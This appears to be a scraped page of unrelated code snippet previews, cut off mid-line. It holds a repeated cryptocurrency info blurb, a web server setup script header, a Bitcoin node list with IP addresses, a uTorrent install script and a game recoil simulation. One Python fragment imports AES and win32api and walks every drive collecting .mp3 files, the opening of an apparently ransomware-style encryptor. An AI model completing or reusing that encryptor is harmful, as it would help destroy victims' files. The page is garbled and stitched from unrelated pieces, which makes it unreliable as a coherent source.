Codebase: Erlang Genesis block: Mar-02-2018 11:01:29 +UTC Consensus Mechanism: Proof of Work Algorithm: SHA256 Maximum Supply: Unknown Current Supply: 53,134.776750 Explorer: veoscan.io
Summary
#!/usr/bin/env bash | |
# ============================================================================= | |
# | |
# ------------------------------------------------------------------ | |
# Bash Script to Setup a Web Server | |
# Install Apache or nginx, PHP, and FastSitePHP with a Starter Site | |
# ------------------------------------------------------------------ | |
# | |
# https://www.fastsitephp.com |
Codebase: Erlang Genesis block: Mar-02-2018 11:01:29 +UTC Consensus Mechanism: Proof of Work Algorithm: SHA256 Maximum Supply: Unknown Current Supply: 53,134.776750 Explorer: veoscan.io
Summary
{"latest_height": 418653, "timestamp": 1467291903, "nodes": {"213.239.218.20:8333": [70012, "/Satoshi:0.12.0/", 1466846746, 5, 418653, "ns1.ativel.com", "N\u00fcrnberg", "DE", 49.4478, 11.0683, "Europe/Berlin", "AS24940", null], "45.62.245.122:8223": [80001, "/BitcoinUnlimited:0.12.0(EB16; AD4)/", 1466136030, 21, 418653, "unlimited.miningcryp.to", "Kitchener", "CA", 43.4106, -80.5011, "America/Toronto", "AS55053", "2267921 ONTARIO LTD"], "47.90.10.59:8333": [70012, "/Satoshi:0.12.0/", 1467283721, 5, 418653, "47.90.10.59", "Ottawa", "CA", 45.3433, -75.8265, "America/Toronto", "AS45102", "Alibaba (China) Technology Co., Ltd."], "69.50.189.156:8333": [70002, "/Satoshi:0.11.0/", 1466941442, 1, 418653, "69.50.189.156.cable.tpia.cipherkey.com", "Vancouver", "CA", 49.2788, -123.1139, "America/Vancouver", "AS25668", "Cipherkey Exchange Corp."], "td7tgof3imei3fm6.onion:8333": [70012, "/Satoshi:0.12.1/", 1466533384, 5, 418653, null, null, null, 0.0, 0.0, null, null, null], "31.172.85.47:8333": [70012, "/Satoshi:0.12.1/ |
import os, random, struct, hashlib, time, win32api | |
from Crypto.Cipher import AES | |
extensions = ['.mp3'] | |
def wubwub(key): | |
for drive in win32api.GetLogicalDriveStrings().split('\000')[:-1]: | |
for root, dirs, files in os.walk(drive): | |
for file in files: | |
if file.endswith(tuple(extensions)): |
import requests | |
import subprocess | |
import json | |
import sys | |
import threading | |
import time | |
from Queue import Queue | |
import urllib3 | |
import urllib3.contrib.pyopenssl |
#bin/bash | |
# uTorrent installation script on Ubuntu 14.04 | |
# 13.10.2015 - CD0x23 | |
sudo apt-get install libssl0.9.8:i386 | |
wget http://download.utorrent.com/linux/utorrent-server-3.0-25053.tar.gz | |
sudo cp utorrent-server-3.0-25053.tar.gz /opt/ | |
cd /opt/ | |
sudo tar -xvf utorrent-server-3.0-25053.tar.gz | |
sudo rm -rf utorrent-server-3.0-25053.tar.gz |
import math | |
tickrate = 100 | |
firerate = 0.1 # ak47 firerate (seconds) | |
seconds = 2 # nr of seconds to run spraying simulation | |
def inacc(): | |
with open('CSinaccuracypre2.csv', 'w') as file: | |